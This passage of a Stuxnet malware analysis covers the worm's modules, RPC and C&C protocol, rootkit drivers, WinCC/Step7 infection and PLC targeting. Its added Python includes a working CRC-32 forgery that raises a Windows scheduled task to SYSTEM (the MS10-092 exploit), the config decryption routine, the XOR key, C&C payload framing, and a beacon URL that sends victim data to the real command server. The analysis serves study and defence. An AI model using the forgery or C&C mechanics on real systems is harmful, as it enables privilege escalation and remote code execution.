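    c = final_state
    for b in reversed(suffix):
        idx = _REV[c >> 24]
        c = (((c ^ _TABLE[idx]) << 8) & _MASK) | (idx ^ b)
    return c


def crc32_patch(prefix: bytes, suffix: bytes, target: int) -> bytes:
    """Return 4 bytes X such that crc32(prefix + X + suffix) == target."""
    want = _state_before(suffix, target ^ _MASK)  # register required right after X
    idxs = []                                       # backwards over the 4 unknown bytes
    for _ in range(4):
        idx = _REV[want >> 24]
        idxs.append(idx)
        want = ((want ^ _TABLE[idx]) << 8) & _MASK
    c, out = _state_after(prefix), bytearray()      # forwards from the real prefix state
    for idx in reversed(idxs):
        out.append((c ^ idx) & 0xFF)                # choose the byte that selects table index idx
        c = _TABLE[idx] ^ (c >> 8)
    return bytes(out)


# Constructed task definition (illustrative element names, not a real scheduler file).
ORIGINAL_TASK = b"""<?xml version="1.0"?>
<Task version="1.2">
  <Principals><Principal><UserId>alice</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\\Users\\alice\\update.exe</Command></Exec></Actions>
</Task>
"""
XML_SAFE = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .,;:_=+/()[]")


def forge_task(original: bytes, user_id: bytes, run_level: bytes) -> bytes:
    """Raise the task's privileges, then add a comment whose padding restores the original CRC-32.
    The 4 patch bytes are arbitrary binary, so a nonce in the comment is varied until they are XML-safe."""
    target = crc32(original)
    body = original.replace(b"<UserId>alice</UserId>", b"<UserId>" + user_id + b"</UserId>")
    body = body.replace(b"<RunLevel>LeastPrivilege</RunLevel>",
                        b"<RunLevel>" + run_level + b"</RunLevel>")
    head, sep, tail = body.rpartition(b"</Task>")  # the comment goes just before the closing tag
    for nonce in range(100000):
        prefix = head + b"<!-- " + str(nonce).encode() + b" "
        suffix = b" -->" + sep + tail
        patch = crc32_patch(prefix, suffix, target)
        if all(b in XML_SAFE for b in patch):
            forged = prefix + patch + suffix
            assert crc32(forged) == target
            return forged
    raise RuntimeError("no XML-safe collision found")


if __name__ == "__main__":
    forged = forge_task(ORIGINAL_TASK, b"S-1-5-18", b"HighestAvailable")
    print(forged.decode())
    print(hex(crc32(ORIGINAL_TASK)), "==", hex(crc32(forged)))
```

The check a defender wants from this is the negative one: any integrity mechanism whose digest can be solved for in a few microseconds gives no integrity at all, which is why the MS10-092 fix had to change the algorithm rather than the file permissions.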
Functioning of the malware

The malware can be decomposed into several files. The main module, which takes the form of a DLL, is packed with UPX. This module is executed at the start of an attempt at compromise, whatever the vector (USB drive, network or SQL). As has previously been explained, the malware uses four zero-day Windows vulnerabilities to spread via different vectors (USB and local network). All of these techniques are used to install it on a system. In the most widespread case, infection by opening a directory present on a USB drive, the exploitation of the LNK vulnerability launches execution of the main module.

Functionalities provided

Among other things, execution of this module launches a rootkit to hide the malicious files present on the USB drive. For this, certain system functions of the shared libraries "ntdll.dll" and "kernel32.dll" are intercepted, so that code can be injected and so that the presence of various malicious files can be hidden based on specific criteria (".lnk" files with a size of 1,471 bytes and "~WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0).

The malware is capable of injecting executable code into running processes, or into a new process whose name corresponds to that of an antivirus program. These operations mean that it is not necessary to load a file from disk that would risk being detected by an antivirus program.

Several network functionalities are implemented within the malware. Among these are the RPC client and server. P2P communications and the use of a C&C server are mainly used to keep the malware up to date and to recover information. Nevertheless, these could be used to download and install other malware or to exfiltrate sensitive information stolen from the compromised system.

Several other functionalities useful to the malware's proliferation have been added to it by its designers. Among these are functionalities allowing it to spread, hide itself and lastly update itself. These correspond, overall, to the various functions (21) exported by Stuxnet's main module:

- Function 1: infect removable media and launch the RPC server;
- Function 2: intercept the calls to certain functions in order to infect .S7P and .MCP files corresponding to Step7 projects;
- Function 4: initiate the Stuxnet uninstallation procedure;
- Function 5: check that the rootkit (the kernel driver MrxCls.sys) is correctly installed;
- Functions 6 and 7: return the version of Stuxnet installed;
- Functions 9, 10 and 31 (13?): update the malware from Step7 files;
- Function 14: infect Step7 files;
- Function 15: point of entry for the system-infection routine;
- Function 16: infect the system (installation of drivers, DLLs, resources, code injection, etc.);
- Function 17: replace a Step7 DLL so as to be able to intercept the calls to certain functions;
- Function 18: complete uninstallation of the malware;
- Function 19: infect a USB drive;
- Function 22: infect remote systems via the local network;
- Function 24: check the Internet connection;
- Function 27: RPC server;
- Function 28: dialogue with the command and control (C&C) server;
- Function 29: dialogue with the C&C server and execute the code returned;
- Function 32: RPC server used by the service process to respond to certain RPC calls.
Installation of an RPC server

The RPC server is subdivided into two components for managing local and remote RPC calls. For this, Stuxnet infects different processes according to the type of RPC call to be managed: "services.exe" for "local" calls, or one of the processes "netsvc", "rpcss" or "browser" for remote RPC calls. The various RPC methods are as follows:

- Method 1: returns the version of Stuxnet;
- Method 2: loads the module passed as a parameter in a new process and executes the specified exported function;
- Method 3: loads the module passed as a parameter into the memory space of the current process and calls the first exported function;
- Method 4: loads the module passed as a parameter into a new process and executes it;
- Method 5: creates a "dropper" and sends it to a compromised system;
- Method 6: executes the specified application;
- Method 7: reads the data from the specified file;
- Method 8: writes the data into the specified file;
- Method 9: deletes a file;
- Method 10: performs various tasks based on the names of files intercepted using the "hooks" installed by "Method 2", and writes the information into a log file.

It appears that the last three methods implemented are not used by Stuxnet.

Thanks to this RPC-based mechanism, which can be used within the context of P2P communications, Stuxnet is, among other things, able to update itself on a local network from another compromised system.

C&C communications

The second functionality related to the network is a module for communicating with one of the command and control (C&C) servers. Like the "P2P over RPC" function, the module allows a compromised system to load malicious code into memory and execute it.

The list of command and control servers is specified in the configuration file "%WINDIR%\inf\mdmcpq3.pnf". This file of 1,860 bytes may be decrypted with the following function (one call per encrypted byte; "key" is a constant, "counter" the per-byte counter and "sym" the encrypted byte):

    # decrypt function in python: returns one plaintext byte
    def decrypt(key, counter, sym):
        v0 = key * counter
        v1 = v0 >> 0xb
        v1 = (v1 ^ v0) * 0x4e35
        v2 = v1 & 0xffff          # only the low 16 bits of the product matter from here on
        v3 = v2 * v2
        v4 = v3 >> 0xd
        v5 = v3 >> 0x17
        xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff
        xorbyte = xorbyte ^ ((v2 >> 8) & 0xff)
        xorbyte = xorbyte ^ (v2 & 0xff)
        return xorbyte ^ sym      # the keystream byte is XORed with the encrypted byte

This file contains several items of information, such as the list of servers used to check the Internet connection ("www.windowsupdate.com", "www.msn.com"), the list of C&C servers ("www.mypremierfutbol.com", "www.todaysfutbol.com"), the dates and times of activation and deactivation of the worm, after which the worm uninstalls itself automatically using the previously-mentioned functions, the version of the malware, the minimum number of files that a USB drive must contain to be able to be infected using malicious LNK files, and lastly other ancillary information used for the correct functioning of the worm and its propagation.

Concerning the functioning mode of the C&C servers, an instance of Stuxnet does not exchange plaintext messages with the two previously-mentioned servers. Each of the messages sent over the Internet to the servers is encrypted using a very simple algorithm: a simple XOR with the following 31-byte key:

    // Encryption key
    unsigned char Key[31] = {
        0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2,
        0x72, 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45,
        0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1
    };

    // Encryption procedure: XOR each byte with the key, repeated every 31 bytes
    void EncryptData(unsigned char *Buffer, int BufferSize, const unsigned char *Key)
    {
        for (int i = 0; i < BufferSize; i++)
            Buffer[i] ^= Key[i % 31];
    }
The structure of a message sent by the malware is quite complex. It contains much information specific to the victim, among which is information related to the network interfaces and the versions of the OS and of the malware. This message is simply sent to a server by an HTTP GET request to one of the URLs listed in the configuration file, for example: http://www.mypremierfutbol.com/index.php?data=STUXNET_CC_MESSAGE.

In response to this request, the server returns a message composed of several items: a size coded over 4 bytes, a flag coded over 1 byte and lastly an executable image. If the size of the received message does not correspond to the indicated size of the image + 5 bytes, the malware ignores this response. If the size corresponds, then according to the value of the flag, the malware loads the executable image into the memory space of the current process or into another process using one of the dedicated RPC methods, then executes it.

It nevertheless appears that this important functionality has not really been used, neither to update the software nor to install additional malicious tools. It is nonetheless a backdoor. The rapid blocking of the domains www.mypremierfutbol.com and www.todaysfutbol.com perhaps had a role in this.

Persistence

To ensure the persistence of the functionalities previously installed, Stuxnet nevertheless has to profoundly modify the system. This is because it is not possible to inject code into arbitrary processes or to durably hide files in user mode without profound modifications to the system. Two system drivers, signed with private keys corresponding to certificates belonging to Realtek and JMicron, are therefore installed using the elevated privileges obtained from the two proofs of concept (Keyboard Layout and Task Scheduler). "MrxCls.sys" is used to inject code into a process. "MrxNet.sys" is a rootkit for hiding the malicious files used to exploit the LNK vulnerability. In contrast to the rootkit used in user mode, this one is persistent.

The fact that these drivers are signed with stolen certificates means that they can be installed more discreetly, so as not to arouse the user's suspicions (a signature is essential for installing drivers under Windows Vista/Windows 7). The ".lnk" files with a size of 1,471 bytes, and the "~WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0, are filtered so that they are not displayed by the file explorer. This filter is active only for the file systems NTFS, FAT and CDFS. After registering with the function "IoRegisterFsRegistrationChange()", the driver is called each time a file system is mounted and can therefore monitor the requests that are sent to it. Thus, the driver can act with complete impunity and choose which files to display in a directory.

Seeking and infecting the WinCC environment

Lastly, to maximize the efficiency of the proliferation operation, the malware seeks the WinCC software. Once it is discovered, Stuxnet connects to the database used by the software, using a standard hard-coded password. Once connected to this database, the malware sends the malicious code via SQL requests, then executes it.

This first action compromises the MSSQL server. Then, the malware modifies the SQL views defined on the server to force the execution of code each time these views are accessed.

Stuxnet is lastly capable of infecting WinCC / Step7 projects associated with WinCC Simatic Manager. The files that are sought and modified have the extensions .S7P, .MCP or .TMP. Under certain specific conditions, files with the names "xutils\listen\xr000000.mdx", "xutils\links\s7p00001.dbf" and "xutils\listen\s7000001.mdx" or "GracS\cc_alg.sav", "GracS\db_log.sav" and "GracS\cc_alg.sav" are deposited. In both cases, these files correspond respectively to an encrypted version of the malware's main DLL, to a data file of 90 bytes and lastly to an encrypted version of Stuxnet's block of configuration data. Lastly, a specially-designed DLL is placed in the multiple sub-directories of the directory "hOmSave7".

The infection mechanism is relatively simple. When the project is opened using WinCC Simatic Manager, the DLL placed in the sub-directories of the directory "hOmSave7" is automatically sought. When this is loaded, the library decrypts the protected data and loads the malware's main component into memory to complete the process of infection.
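The C&C exchange described on this page and the previous one, as an added example that is not code from the article or from Stuxnet: the request side uses the 31-byte repeating XOR key quoted earlier, and the response side frames an executable image as size (4 bytes), flag (1 byte) and image. Two things are assumed here because the article does not state them: the size field is taken as little-endian, and the "MZ" check on the returned image is an extra sanity check added for the example. The beacon content and the image bytes are constructed. The example also shows what "very simple algorithm" means for a defender: because the key repeats, 31 bytes of known plaintext (the beacon's fixed layout) recover the entire key from a single captured request.

```python
import struct

# The 31-byte key quoted in the article.
CC_XOR_KEY = bytes([0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2,
                    0x72, 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45,
                    0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1])


def xor_repeating(buf: bytes, key: bytes = CC_XOR_KEY) -> bytes:
    """The C&C 'encryption' as the article describes it: XOR with a repeating key.
    The same call decrypts, since XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int = 31) -> bytes:
    """A repeating-key XOR leaks key[i] = c[i] ^ p[i] wherever the plaintext is known,
    so one request with key_len known leading bytes yields the whole key."""
    if min(len(ciphertext), len(known_plaintext)) < key_len:
        raise ValueError("need at least key_len bytes of aligned known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


def build_response(flag: int, image: bytes) -> bytes:
    """Server side: <size:4><flag:1><image>. Little-endian size is an assumption of this example."""
    return struct.pack("<IB", len(image), flag) + image


def parse_response(blob: bytes):
    """Client-side validation as the article states it: ignore unless len == size + 5.
    Returns (flag, image) or None. The 'MZ' test is an added sanity check, not from the article."""
    if len(blob) < 5:
        return None
    size, flag = struct.unpack_from("<IB", blob, 0)
    if len(blob) != size + 5:
        return None
    image = blob[5:]
    if not image.startswith(b"MZ"):
        return None
    return flag, image


# Constructed beacon: the article says it carries interface, OS and malware version data.
SAMPLE_BEACON = b"ver=1.0.1;os=5.1.2600;ifaces=00-11-22-33-44-55,10.0.0.5;host=ENG-WS01"
SAMPLE_IMAGE = b"MZ" + bytes(62) + b"PE\0\0" + bytes(200)  # PE-looking stub, not a real executable


def sample_exchange():
    """Both sides on constructed data: beacon out, framed image back, validated by the client."""
    wire_request = xor_repeating(SAMPLE_BEACON)
    assert xor_repeating(wire_request) == SAMPLE_BEACON  # round trip
    wire_response = build_response(1, SAMPLE_IMAGE)
    return parse_response(wire_response)


if __name__ == "__main__":
    print(sample_exchange()[0])
    print(recover_key(xor_repeating(SAMPLE_BEACON), SAMPLE_BEACON) == CC_XOR_KEY)
```

The article does not say how the encrypted bytes are encoded into the "data=" query parameter, so the example stops at the raw byte strings; on a capture, apply the decoding first and the key recovery afterwards.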
Attack scenario

1. The attacker manages to infect a USB drive used by a person working on a computer connected to the target information system.
2. The person uses their USB drive within the target information system's LAN.
3. After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.
4. Stuxnet contacts its C&C server.
5. An employee whose USB drive has been contaminated connects it to a workstation equipped with WinCC software and belonging to an industrial network.
6. When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to the PLC.
7. The malicious code sends specific orders to the variable frequency drives.
7 bis. The person responsible for supervising the equipment cannot identify the presence of Stuxnet.
The resources embedded by Stuxnet

The two previously-mentioned drivers correspond respectively to resources 201 and 242 of the main module. Eleven other resources are also available, such as an executable PE module (210), a LNK link file (240), and a block of configuration data for the driver "MrxCls.sys" (205):

- Resource 201: driver "MrxCls.sys", signed using certificates belonging to Realtek or JMicron;
- Resource 202: DLL used in compromising Step7 projects;
- Resource 203: CAB file containing an equivalent of resource 202 used for compromising WinCC projects;
- Resource 205: encrypted configuration-data file for the driver "MrxCls.sys";
- Resource 208: shared library "s7otbxdx.dll" usurping the functions of the original Siemens DLL;
- Resource 209: file of 25 bytes containing encrypted data, deposited in "%WINDIR%\help\winmic.fts";
- Resource 210: PE file template used for creating or injecting executables ("~WTR4132.TMP");
- Resource 221: malicious code used for exploiting the security vulnerability present in the server service (MS08-067);
- Resource 222: malicious code used for exploiting the security vulnerability present in the print spooler (MS10-061);
- Resource 240: LNK file template;
- Resource 241: "~WTR4141.TMP", DLL used for loading the executable corresponding to resource 210, "~WTR4132.TMP", responsible for installing the malware (dropper);
- Resource 242: driver "MrxNet.sys" (rootkit) used to mask the presence of certain files;
- Resource 250: malicious code used to exploit the security vulnerability present in the management of the keyboard layout (MS10-073).

The following resources were observed by Symantec in the older versions of Stuxnet, but have disappeared in the latest versions:

- Resource 207: information related to the exploitation of a vulnerability using Autorun.inf;
- Resource 231: resource used to check whether the system is connected to the Internet or not.

INFO: Definitions

PLC: Programmable Logic Controller. A programmable controller is a programmable electronic device for controlling industrial processes by sequential processing. It sends orders towards the pre-actuators (the operative section, on the actuator side) based on input data from sensors (the control section, on the sensor side), instructions and a computer program.

SCADA: Supervisory Control And Data Acquisition. Large-scale remote-control system for the real-time processing of a large number of remote measurements and for remotely controlling technical facilities. It is an industrial technology in the field of instrumentation.
Phase III: attack on industrial systems

Detection of SCADA systems based on WinCC

Once the Windows system has been compromised and the malware installed, the third phase of the attack can begin. This corresponds to the search for certain specific software. To access the SCADA system, the authors of the malware have chosen to go via the development tools associated with the target system: Step7 and WinCC. These two tools are respectively used to develop programs operating on PLC-type systems and to check their correct functioning. Incidentally, these tools are potentially the only point of entry to these sensitive systems, given that the latter are not supposed to be connected to the Internet, but rather to a network dedicated to them.

To carry out this third phase of the attack, the malware searches for and replaces the shared library "s7otbxdx.dll". This library, which comes from the Simatic software suite from Siemens, is used to have a PC running Windows communicate with a PLC from the Simatic family. Usually, a developer programs their equipment in one of the numerous programming languages supported by the software suite, such as STL or SCL. This is subsequently compiled into a specific bytecode called "MC7", before being loaded on the PLC.

By renaming the shared library "s7otbxdx.dll" to "s7otbxsx.dll", then placing its own version of the library "s7otbxdx.dll", the malware is able to intercept all calls to the functions exported by the original library and to manipulate them at will. In fact, only the behavior of a few functions is affected. Most of the calls to the functions of "s7otbxdx.dll" are forwarded directly to the equivalent functions in "s7otbxsx.dll". The 16 functions whose behavior is altered correspond to the methods for reading ("s7blk_read"), writing ("s7blk_write"), enumerating ("s7blk_findfirst" and "s7blk_findnext") and deleting ("s7blk_delete") the blocks of code present on the PLC. It is by modifying these key functions of the library that the attackers ensure the durability and discretion of their attack. To avoid detection when an operator connects to a compromised PLC, the "read" and "enumeration" functions hide certain blocks of code from the operator and only return the original "healthy" code.

But not all PLCs are targeted. Stuxnet, using two threads launched by the malicious library, searches for precisely two types of device with the references Siemens 6ES7-315-2 and 6ES7-417. The main difference between these two models of controller is the quantity of embedded memory: 256 KB for the S7-315 series against 30 MB for the S7-417 series.

Module 315

Secondly, in the configuration targeted by the malware, the PLCs of the 300 series (6ES7-315-2) must use between one and six Profibus CP 342-5 modules to communicate with the systems under their control. Once again, only certain identification numbers are sought. In the case of Stuxnet, these are the Profibus identification numbers "7050h" and "9500h". These numbers uniquely identify the models of the items of equipment, which are known as "frequency converter drives" or "variable frequency drives". The corresponding products are the "KFC750V3" manufactured by Fararo Paya, based in Teheran in Iran, and the "Vacon NX" from Vacon, based in Finland.
Variable frequency drives are generally used to control the speed of other components such as motors.

Finally, the last criterion sought is the presence of at least 33 variable frequency drives among the two models previously mentioned.

If these various extremely precise conditions are fulfilled, the process of infection begins by the modification of certain blocks of code such as DP_RECV, OB1 and OB35. These blocks of code are infected by overwriting them or by increasing their size in order to introduce the malicious code at the beginning of the block. These operations ensure that the added code is executed when the block in question is called. The functions FC1865 and FC1874 are therefore respectively injected into blocks OB1 and OB35.

Note: DP_RECV corresponds to the function in charge of managing the reception of data on the bus. OB1 corresponds to the main function, which is continuously executed. OB35 corresponds to a timer executed every 100 ms.

In reality, Stuxnet may infect systems that correspond to its selection criteria in different ways. This is because two sequences of malicious code exist and may be used to infect a PLC according to the distribution of the products that are controlled. The first sequence, referenced A by Symantec, is selected when there is a majority of Vacon devices. The second sequence, referenced B by Symantec, is used when a majority of Fararo Paya variable frequency drives are present.

In all cases, the 315 module is designed to allow a PLC 6ES7-315-2 to control up to six Profibus "masters", each controlling 31 "slave" converters on its own dedicated Profibus network.

Finally, the 315 attack, which corresponds to about 3,000 lines of STL code accompanied by 4 data blocks (DB888, DB889, DB890 and DB891), is organized as follows. The code block DP_RECV is copied to the address FC1869, then replaced by malicious code which itself calls the original code that was moved. Each time a variable frequency drive sends data to a PLC 6ES7-315-2 via the Profibus CP 342-5 module, its data is transferred to the original code before being reprocessed by the added malicious code. Each of the messages to be processed must be in a specific format when it is examined by DP_RECV. Namely, it must be composed of 31 records of 28 or 32 bytes, corresponding to each of the converters.

Subsequently, the system goes into a state machine clearly described by Symantec. The transition between each state is governed by timers, tests or the end of other tasks. Approximately, the system collects data for a period of between 13 days and three months, before sending falsified data on the communication bus for about 50 minutes, then returning to the initial state.

According to Symantec's study, the system uses DP_RECV to inspect the messages sent by the variable frequency drives, which contain specific information corresponding to the current operating frequency. Lastly, this attack allows an attacker who has successfully injected their malicious code to withdraw the control that the legitimate blocks of code had over the data transmitted, during the phase nicknamed "deadfoot" ("DEADF007" in the code). This phase corresponds to the 50 minutes during which the PLC sends semi-arbitrary information to the various variable frequency drives through the Profibus modules. The messages sent correspond to frequencies that must be converted into rotation speeds by the variable frequency drives. Furthermore, execution of the legitimate code is prevented using a call to the instruction BEC (Block End Conditional) instead of letting the execution of the program continue. Without
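The target-selection rules spread over the last two pages (CPU model, one to six CP 342-5 masters, Profibus identification numbers 7050h and 9500h, at least 33 drives, and the choice of sequence A or B by majority) fit in a few lines, and writing them down is the quickest way to check whether a given plant configuration would have matched. The following Python is an added example, not Stuxnet's code: the inventory dictionary format is an assumption made for the example, the article details only the 315 path (so a 6ES7-417 is reported as a targeted model without a sequence), and a tie between the two drive models is treated as no match, since the article speaks only of a majority. The inventories are constructed.

```python
from collections import Counter

TARGET_CPUS = {"6ES7-315-2", "6ES7-417"}
PROFIBUS_MODULE = "CP 342-5"
DRIVE_IDENTS = {0x7050: "Fararo Paya KFC750V3", 0x9500: "Vacon NX"}  # Profibus ident numbers from the article
MIN_DRIVES = 33
MAX_MASTERS, SLAVES_PER_MASTER = 6, 31


def classify_plc(inventory: dict):
    """Apply the selection rules from this section to one PLC's hardware inventory.

    inventory = {"cpu": "6ES7-315-2", "modules": ["CP 342-5", ...], "slaves": [0x9500, 0x7050, ...]}
    (the dictionary shape is an assumption of this example; "slaves" lists the Profibus ident
    number of every slave seen on the masters). Returns None when the PLC is not a target,
    otherwise a dict with the chosen sequence and the counts that led to it."""
    cpu = inventory.get("cpu")
    if cpu not in TARGET_CPUS:
        return None
    if cpu != "6ES7-315-2":
        # The article only details the 315 sequences: report the 417 as targeted but undetermined.
        return {"cpu": cpu, "sequence": None}
    masters = sum(1 for m in inventory.get("modules", []) if m == PROFIBUS_MODULE)
    if not 1 <= masters <= MAX_MASTERS:
        return None
    slaves = inventory.get("slaves", [])
    if len(slaves) > masters * SLAVES_PER_MASTER:  # each master addresses at most 31 slaves (article)
        raise ValueError("more Profibus slaves than the masters can address")
    drives = Counter(DRIVE_IDENTS[i] for i in slaves if i in DRIVE_IDENTS)
    if sum(drives.values()) < MIN_DRIVES:
        return None
    vacon, fararo = drives["Vacon NX"], drives["Fararo Paya KFC750V3"]
    if vacon == fararo:
        return None  # assumption: a tie is no majority, hence no match
    return {"cpu": cpu, "masters": masters, "vacon": vacon, "fararo_paya": fararo,
            "sequence": "A" if vacon > fararo else "B"}


# Constructed inventories, not taken from any real plant.
MOSTLY_VACON = {"cpu": "6ES7-315-2", "modules": ["CP 342-5", "CP 342-5"],
                "slaves": [0x9500] * 31 + [0x7050] * 9}
MOSTLY_FARARO = {"cpu": "6ES7-315-2", "modules": ["CP 342-5", "CP 342-5", "CP 342-5"],
                 "slaves": [0x7050] * 40 + [0x9500] * 10}
TOO_FEW_DRIVES = {"cpu": "6ES7-315-2", "modules": ["CP 342-5"],
                  "slaves": [0x9500] * 20 + [0x0ABC] * 11}  # 0x0ABC: some other slave type
WRONG_CPU = {"cpu": "6ES7-314", "modules": ["CP 342-5"], "slaves": [0x9500] * 40}
NO_MASTERS = {"cpu": "6ES7-315-2", "modules": [], "slaves": []}

if __name__ == "__main__":
    for name, inv in [("mostly Vacon", MOSTLY_VACON), ("mostly Fararo Paya", MOSTLY_FARARO),
                      ("too few drives", TOO_FEW_DRIVES), ("wrong CPU", WRONG_CPU)]:
        print(f"{name}: {classify_plc(inv)}")
```

The useful reading of the result is the inverse one: a site whose hardware configuration never satisfies these rules was never at risk from this payload, whatever its Windows infection status, while a site that does match is the one where the s7otbxdx.dll replacement described above needs to be checked for.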